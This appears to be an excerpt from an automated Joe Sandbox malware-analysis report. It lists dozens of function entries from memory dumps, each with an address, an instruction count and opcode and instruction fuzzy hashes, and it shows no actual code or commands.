                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5806dd117891a8b3b2ef4ed7501d49a4187bfb04495f19a50ae76b3419ef042a
                                                                • Instruction ID: 2ec75b6a87515465b2bd23d5c6c740ce14a0494d46afc49008d0fc1f8723eb95
                                                                • Opcode Fuzzy Hash: 5806dd117891a8b3b2ef4ed7501d49a4187bfb04495f19a50ae76b3419ef042a
                                                                • Instruction Fuzzy Hash: 5B0148B0D052099FDBA4DFAAC8416AEBBF5FB88304F158569D428E7305E7309A45DF81
                                                                Function 06C60AD0 Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f3202f2f82b21f75d016722c87ffe086eec5448148f1869a4536eed4e3f2d87
                                                                • Instruction ID: cb915cd52240f6847a51b3a28a6a68af0607d08fa514dac1d6bd2bf3e21fae22
                                                                • Opcode Fuzzy Hash: 5f3202f2f82b21f75d016722c87ffe086eec5448148f1869a4536eed4e3f2d87
                                                                • Instruction Fuzzy Hash: 64018C793006109FC3099B25D518A1AB7A7EFCC711B108528EA0A8B794CF75EC02CBD0
                                                                Function 07131405 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204883280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7130000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb07eb356f3e078ab9db50086b484917c1f06ce46415ba62a0e271de28503e3f
                                                                • Instruction ID: 5402ad9c74bf7232df31df0d379b1f44c65f8ceaf68bf53c937319c3a654ef20
                                                                • Opcode Fuzzy Hash: eb07eb356f3e078ab9db50086b484917c1f06ce46415ba62a0e271de28503e3f
                                                                • Instruction Fuzzy Hash: 9F11E578A042198FCB62DF58C888ADAB7B2FB89304F5044E5E809EB384E7345EC48F50
                                                                Function 06E24151 Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f99bbe848ae5ba408f2937c06d6de19e1161d57e3e50d9528f1ff228256d4b7
                                                                • Instruction ID: b0df2be323ae13f8614762e62c5c445ddceaa33d4c4fde321fdb8ae79c7939f0
                                                                • Opcode Fuzzy Hash: 5f99bbe848ae5ba408f2937c06d6de19e1161d57e3e50d9528f1ff228256d4b7
                                                                • Instruction Fuzzy Hash: 36F0193180421ADECF019F98D8008EEBB76FF99314F00C519E95966251D731A6AADB90
                                                                Function 06C632A8 Relevance: .0, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9a06724ebb046419e94b1ff7ce81dd96446422dae0fdafb04ed323104496cdbe
                                                                • Instruction ID: cbcc0f35c59f260ac8be6c46e8a1d63a2c689b4feb5876be91b5d458515ffba1
                                                                • Opcode Fuzzy Hash: 9a06724ebb046419e94b1ff7ce81dd96446422dae0fdafb04ed323104496cdbe
                                                                • Instruction Fuzzy Hash: 92F0A0307403649FD7A526BAAC1A72A339BEB81A11F104479F9099B290EF72D801C7D9
                                                                Function 06E24158 Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4e695962bfba1ac7a266bfe7b26e847272a5eb75feeec646d74c7532240d195d
                                                                • Instruction ID: b0276cf71884440025ad83477f6a11f155770a6c5e051468e59ab6ffb7d85af5
                                                                • Opcode Fuzzy Hash: 4e695962bfba1ac7a266bfe7b26e847272a5eb75feeec646d74c7532240d195d
                                                                • Instruction Fuzzy Hash: 07F03731C0021ADECF01DF98D8019EEBB72FF99324F00C619E95837251D732A6AADB90
                                                                Function 06E2415C Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 12b3c1c4a1b411e9848cbc4176ab5f51753270a48b935a6bb5792218a7751350
                                                                • Instruction ID: d1022f8369ab483e694d3d64613f5ce3b4d4e9d70a96f361586dad2499365c96
                                                                • Opcode Fuzzy Hash: 12b3c1c4a1b411e9848cbc4176ab5f51753270a48b935a6bb5792218a7751350
                                                                • Instruction Fuzzy Hash: D4F0EC31D0061ADBDF01DF98D8019EDBB75FF99324F00C619E96837291D731A6A6DB90
                                                                Function 06E24160 Relevance: .0, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d498d24717d935c9f7060dc0730fa637a450dcc2a50fe03a1e1afd2eac4bd9bb
                                                                • Instruction ID: 916503051f118e81744ca940ac63b0ef4e553ea68288e17bd66293e3eb8cca82
                                                                • Opcode Fuzzy Hash: d498d24717d935c9f7060dc0730fa637a450dcc2a50fe03a1e1afd2eac4bd9bb
                                                                • Instruction Fuzzy Hash: 0EF0F931C0021AEBCF01DF99D8019EEBB75FF99324F00C519E95837251D732A6A6DB90
                                                                Function 06E258A3 Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce0cb899dfc5864cddc3a8d62c82ff6b2786ba5862cbac12b53eb99407ea581c
                                                                • Instruction ID: d702b72027a856e6497aacaf9e7cd7fb069924aa59e2b1d6ee39dfb20537eaa9
                                                                • Opcode Fuzzy Hash: ce0cb899dfc5864cddc3a8d62c82ff6b2786ba5862cbac12b53eb99407ea581c
                                                                • Instruction Fuzzy Hash: F501F674E0232ACFEB65CF59C944B8AB7F2FB48310F5494A5D418A7258D7749D81CF40
                                                                Function 06E221D1 Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2de60037d7eaba98f4294f666ec0767520a52077644cd6daf351a6acba96e60
                                                                • Instruction ID: d510aba9975f4674842ed2d86ba333c34aaf4c6d91e734d5046eb2d4b04d9085
                                                                • Opcode Fuzzy Hash: d2de60037d7eaba98f4294f666ec0767520a52077644cd6daf351a6acba96e60
                                                                • Instruction Fuzzy Hash: CCF05E3540931DAFDB02DF94DC409AD7F31EF09324F10869AF924562A2D6324EA4EB91
                                                                Function 06E235DE Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ca4cf3b581d808b7bcebcb4fa2ffad4a09aa70472364389da7b8bb484056fb0
                                                                • Instruction ID: cb4964f6822ef8409c6e26801676add94898e9fcbf176ec3cca5e21cddafda9d
                                                                • Opcode Fuzzy Hash: 2ca4cf3b581d808b7bcebcb4fa2ffad4a09aa70472364389da7b8bb484056fb0
                                                                • Instruction Fuzzy Hash: E601AE74905228CFDBA0CF64C844BEABBB1EB09304F5480DA980DB7240C7369E86CF50
                                                                Function 06C845A9 Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f6dad80ecbaf33995025ee137bd3ab1beca76de9fa7ea70338c460f06114547
                                                                • Instruction ID: b2ecddb932d3f79352588f1914dac99da050a09f522b4903506f8d69e1f18469
                                                                • Opcode Fuzzy Hash: 7f6dad80ecbaf33995025ee137bd3ab1beca76de9fa7ea70338c460f06114547
                                                                • Instruction Fuzzy Hash: 2AF05E70D04208AFCB94DFA8C801AADBBF4EB4C305F04C09AAC59E3341C6359B21DF51
                                                                Function 06C84DC0 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f624a1e4c3e640a5b939a1c782473da8f1e11801c704ffb46949098880fc5a62
                                                                • Instruction ID: 10bfac0289992017a1072a387801854560b60a42b6d7ad84c0c3bd26079538cc
                                                                • Opcode Fuzzy Hash: f624a1e4c3e640a5b939a1c782473da8f1e11801c704ffb46949098880fc5a62
                                                                • Instruction Fuzzy Hash: 2DF08C74D05248AFCB94DFA8D5457ACFFF4EB49310F14C0AA9858D7341C6359A41DF40
                                                                Function 06C842C1 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b31110e2531630880ad9f72940fea8de5497437bfbaa891f77c7744f164cbff6
                                                                • Instruction ID: 612f30917ff8ec1d97e8d61323c0c7eeebb164ab0e2b52ab0ac3bf65adca9c3d
                                                                • Opcode Fuzzy Hash: b31110e2531630880ad9f72940fea8de5497437bfbaa891f77c7744f164cbff6
                                                                • Instruction Fuzzy Hash: 45F0A074D05208EFDBA4DFA5E40179CBBF0EB45301F40C1AA9815A6701C2358E40DF81
                                                                Function 06C68E20 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8b2fdc5d16971988efcd7b13e074087b0b5441b98f2aacf4d7ed1c37263c2037
                                                                • Instruction ID: 15033c35ac37f24d3bf931316ecd10ede7e63440bd92c0a758b2b0313014614b
                                                                • Opcode Fuzzy Hash: 8b2fdc5d16971988efcd7b13e074087b0b5441b98f2aacf4d7ed1c37263c2037
                                                                • Instruction Fuzzy Hash: A8E09AB288A34CAFC796EFF09C2599A7FFDDF06200B4105A6E004AF151E9320A04D7B7
                                                                Function 06E20870 Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c914bf256e9bcdeaf5f7bcebfc5594021f517fe755cd59299c123d0599499ad
                                                                • Instruction ID: b786d8ef5e25b24ead4f74d1ebf4b75e25e26b52b7e0b88c095ff08efba035f3
                                                                • Opcode Fuzzy Hash: 2c914bf256e9bcdeaf5f7bcebfc5594021f517fe755cd59299c123d0599499ad
                                                                • Instruction Fuzzy Hash: 06E0223081A2149FC715CB90C9219EE7FB1EB46350F1094CAD808A7392C2314E02DBD1
                                                                Function 06E24DC8 Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3e52208e65ae864c645b79bf519873b57745a86f1228dc3660cf0d99b5d3857
                                                                • Instruction ID: 514e636b5c875876e3e46696cf5487254ab87c6e4586ec83a2bdb28deb99b5ab
                                                                • Opcode Fuzzy Hash: d3e52208e65ae864c645b79bf519873b57745a86f1228dc3660cf0d99b5d3857
                                                                • Instruction Fuzzy Hash: ABF0B434809248EFCB11CFA4D8116ACBFB5EF4A304F0480EAE85457252D6324A21DF91
                                                                Function 06E21619 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa5489e0bf6ca1f54e8f9da8bfe845eab8b0dab4fdccd3198d89893f99ef6950
                                                                • Instruction ID: 527a917b4c237c7f90295292b6d6eaa3050129c894abdc9b5e5ee79c594590b2
                                                                • Opcode Fuzzy Hash: fa5489e0bf6ca1f54e8f9da8bfe845eab8b0dab4fdccd3198d89893f99ef6950
                                                                • Instruction Fuzzy Hash: 55F0303491A2559FC741DFA4C4556D97FB49B0A214F1850D9D84897342D6314E05CB51
                                                                Function 06C845B0 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 608c8fcb7642a94e1cad8b6aeb77a016acac64156a90ef3766f6e8b789da8ca7
                                                                • Instruction ID: 1fbaff2565c2e874f98fa3275e59e142c76c19c26d5813c9e448c743c9712494
                                                                • Opcode Fuzzy Hash: 608c8fcb7642a94e1cad8b6aeb77a016acac64156a90ef3766f6e8b789da8ca7
                                                                • Instruction Fuzzy Hash: 80F01C74D04248EFCB95DFA9C840AADBFF8AF48315F14C0AAA868D3341D6359B21DF50
                                                                Function 06C8017F Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c146e86dc7087e23ffcdc14ca165a88d8644a695df58020beff46c1d508805f
                                                                • Instruction ID: c021084519bf8b31efbcf0a561a08c779f430022781a59ef668461395df50a23
                                                                • Opcode Fuzzy Hash: 1c146e86dc7087e23ffcdc14ca165a88d8644a695df58020beff46c1d508805f
                                                                • Instruction Fuzzy Hash: 11F03030E15109CFEBB0DF65C8446AE77B6FF89308F20452CD405B7205D6388944CF00
                                                                Function 06C69270 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 64727e678f4ef84b2844ca917d01d372dd9aa3b0ec854c3574b7c58c9f89d2a1
                                                                • Instruction ID: 712e1084dc3926d5a3001bf620e5b5b4c5925925ec6f8f5364eeaa67c295ac63
                                                                • Opcode Fuzzy Hash: 64727e678f4ef84b2844ca917d01d372dd9aa3b0ec854c3574b7c58c9f89d2a1
                                                                • Instruction Fuzzy Hash: 05E0D87450F245AFD352CBB1EC11BE9BF7C9F47204B0840C9E8089B253CA329D02CBA6
                                                                Function 06E22A30 Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4b036def01ba7a173699202930041556ace3f95fa5835bc28598b181c688acbe
                                                                • Instruction ID: 4ddeb3ec51e23849396a42dbd122e967fbbb2b297fc72a118393e022cb795fc4
                                                                • Opcode Fuzzy Hash: 4b036def01ba7a173699202930041556ace3f95fa5835bc28598b181c688acbe
                                                                • Instruction Fuzzy Hash: 06F06D74909219EFDF51CF94D940AEDBF72EB49314F10E199FE0626212C7328A32EB80
                                                                Function 06E223FA Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a017f311317cc4280595cd824f52de1f4c315234f4f5b65c7b88c2d459efd59
                                                                • Instruction ID: 3de9cf0f6ce2778f64c8756db91fe4cec7b972bf645f53cc834734089e9c4d65
                                                                • Opcode Fuzzy Hash: 7a017f311317cc4280595cd824f52de1f4c315234f4f5b65c7b88c2d459efd59
                                                                • Instruction Fuzzy Hash: ACF03475905219CFDB82CFC8C844ACEBBB3FB48300F209414E606AB294C73B9E44CB50
                                                                Function 06C862DF Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd6a16fd6fc8ed1ada101d7d0f36da88025d95a7f127c18ac53ab2f3d8679591
                                                                • Instruction ID: 5cf23d003fb7eecc02bf676e2afc58f8a4034ab952eb6ba6c8aa9a9a3f69c257
                                                                • Opcode Fuzzy Hash: cd6a16fd6fc8ed1ada101d7d0f36da88025d95a7f127c18ac53ab2f3d8679591
                                                                • Instruction Fuzzy Hash: B1E06FB28822099EC711EBB0C8057CEBBF8CF0A321F0004A9D008C3240EA344E1AD7A2
                                                                Function 06E26A44 Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 384721619c4740ec76db3e3e772ccae2a2299d3c081a543984fe094eaf4896c6
                                                                • Instruction ID: 894e991b88a079d0f30964cd227990f85540536db2d468987c081eef14729261
                                                                • Opcode Fuzzy Hash: 384721619c4740ec76db3e3e772ccae2a2299d3c081a543984fe094eaf4896c6
                                                                • Instruction Fuzzy Hash: A1E0DFB0809239DFDB80CF94E8414E8BF7AEB45318F10E299D90A67301CA329E42DB91
                                                                Function 06E26029 Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1cb4f1d47e3fca24636a1746ede00c3b9a84ea9354ea40bfa8ac6874cfac8ea
                                                                • Instruction ID: d20751962c24bf64f1ec863f3bb4f5861b0125ebed46eb8de265a937ec407d18
                                                                • Opcode Fuzzy Hash: e1cb4f1d47e3fca24636a1746ede00c3b9a84ea9354ea40bfa8ac6874cfac8ea
                                                                • Instruction Fuzzy Hash: 56F0F834905219EFDF51CF94D5409ECBFB2FB48314F108199E81956251D2328A21EB40
                                                                Function 06E26034 Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc110b76f816ae40121938e127ab47f5761e172e8c4ba152789646de1ec5e7b7
                                                                • Instruction ID: 48cddd10aed347f5a7002e5248bb174f702b9dfc432f7637f8aef0d40dd06b26
                                                                • Opcode Fuzzy Hash: cc110b76f816ae40121938e127ab47f5761e172e8c4ba152789646de1ec5e7b7
                                                                • Instruction Fuzzy Hash: DEF0F835900208EFCB51CF94D9409ACBBB1FF48324F108699A82966291D6328A61EB40
                                                                Function 06C81248 Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 009a68cca19a19ac2575a505ac6e0c5ea70398eb78c2e8b55b78c489abc42b25
                                                                • Instruction ID: ddc0d3a786244053ac54d4b1e6486056bd26c03b8eaed5b20c708c5cd0b2a6ba
                                                                • Opcode Fuzzy Hash: 009a68cca19a19ac2575a505ac6e0c5ea70398eb78c2e8b55b78c489abc42b25
                                                                • Instruction Fuzzy Hash: 4BE02234906209FFCB04EF64D906AE9FBB4EF56300F04809CD80863301C732AA26DBD0
                                                                Function 06E22A39 Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 552567bf1a089e0754c62978daeb2ba0ebabe679ff7ee9a81c18ccd2a3e672bc
                                                                • Instruction ID: 29d0d4f14268154e016d746781180f8870fb8d49644399939e67f18ae81ab3f4
                                                                • Opcode Fuzzy Hash: 552567bf1a089e0754c62978daeb2ba0ebabe679ff7ee9a81c18ccd2a3e672bc
                                                                • Instruction Fuzzy Hash: 1EE06D74908109EFCF51CF94D9409EDBF72EB49314F109159FE0526211C7328A22EB80
                                                                Function 06E26031 Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2aeb89f10adbbf1334aa550d3bb552456ef8074863dbf2303a95efd5db1268f
                                                                • Instruction ID: f20bac3942115c15484eed3478f924a3db6fcf052dc061f03352440d5dc6a983
                                                                • Opcode Fuzzy Hash: d2aeb89f10adbbf1334aa550d3bb552456ef8074863dbf2303a95efd5db1268f
                                                                • Instruction Fuzzy Hash: EFF0F234904209EFCF51CF98D940AACBFB2FB48318F1081A9E81866251D2328A21EB40
                                                                Function 06E26038 Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e42cccd284c61691c37813010a9e8c60298d9de7de0436f7efd783863fba5364
                                                                • Instruction ID: fbd73167d50d08a23f4d6db956956078a8993d96b9f7535e1f53bd69cd67c8c6
                                                                • Opcode Fuzzy Hash: e42cccd284c61691c37813010a9e8c60298d9de7de0436f7efd783863fba5364
                                                                • Instruction Fuzzy Hash: F1F0FB34904208EFCB52CF98D940AACBBBAFB48314F1081A9A81866251D6329A21EB80
                                                                Function 06E21580 Relevance: .0, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b8f6e5a326af1b6abb3b27359807517543252a8a1f620a807abc00c9e9f512a7
                                                                • Instruction ID: 8944d86a65824ea2fcb8561b44638230c3a92ed6cde0ed6c7027501a30283cec
                                                                • Opcode Fuzzy Hash: b8f6e5a326af1b6abb3b27359807517543252a8a1f620a807abc00c9e9f512a7
                                                                • Instruction Fuzzy Hash: F5F020B8C08344AFC701CFA4C8108ACBFB0AF49220F18C6EAD86557292D7368B11EF40
                                                                Function 06E22A40 Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
